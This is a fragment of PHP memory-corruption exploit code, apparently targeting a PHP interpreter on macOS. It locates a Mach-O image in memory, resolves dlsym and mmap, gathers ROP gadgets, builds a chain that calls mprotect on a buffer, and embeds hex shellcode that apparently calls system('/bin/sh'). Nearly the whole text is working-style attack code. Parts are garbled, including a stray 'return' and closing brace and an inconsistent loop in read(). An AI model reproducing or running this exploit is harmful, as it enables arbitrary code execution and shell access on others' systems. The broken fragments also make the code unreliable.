function rop_findexec()
{
$x = [];
$p = ptr() + 0;
for ($i = 0; $i < 0x2000; $i++) {
array_push($x, [0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141]);
}
$a = map($p, 0x10000)[0];
nogc($a);
$a = bin2hex($a);
nogc($a);
$r = strpos($a, "3100000000000000100000000f0000000c000000010000000c00000000000000");
if ($r !== FALSE) {
$a = substr($a, $r + 0x80, 0x10);
$a = hexdec(swapEndianness($a));
$a = $a + 0;
for ($i = 0; $i < 0x100000; $i++) {
$k = map(($a & ~0xff) - 0x100 * $i, 0x8);
if ("cffaedfe07000001" == bin2hex($k[0])) {
return ($a & ~0xff) - 0x100 * $i + 0;
}
}
}
return FALSE;
}
return ibuf($x, 8);
}
$all = alloc(4096);
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800");
$addr = rop_findexec();
nogc($addr);
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002");
// find b84a000002 movl $0x200004a, %eax -> mprotect syscall
nogc($mprotect);
function ig($a, $b)
{
return ibuf(gadget($a, $b), 8);
}
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);
$stack .= $arg3;
$stack .= w64(7);
$stack .= w64($mprotect);
$stack .= w64($all['ptr']);
function read($addr, $sz)
{
$ret = "";
$page = $addr & ~0xffffff;
while ($sz > 0) {
$rsz = min($sz, 0xffffff + 1);
$pg = readpage($addr);
for ($i = 0; $i < $rsz; $i++) {
$ret .= $pg[0][($addr & 0xffffff) + $i];
}
$addr += $rsz;
$sz -= 0x1000;
}
nogc($ret);
return $ret;
}
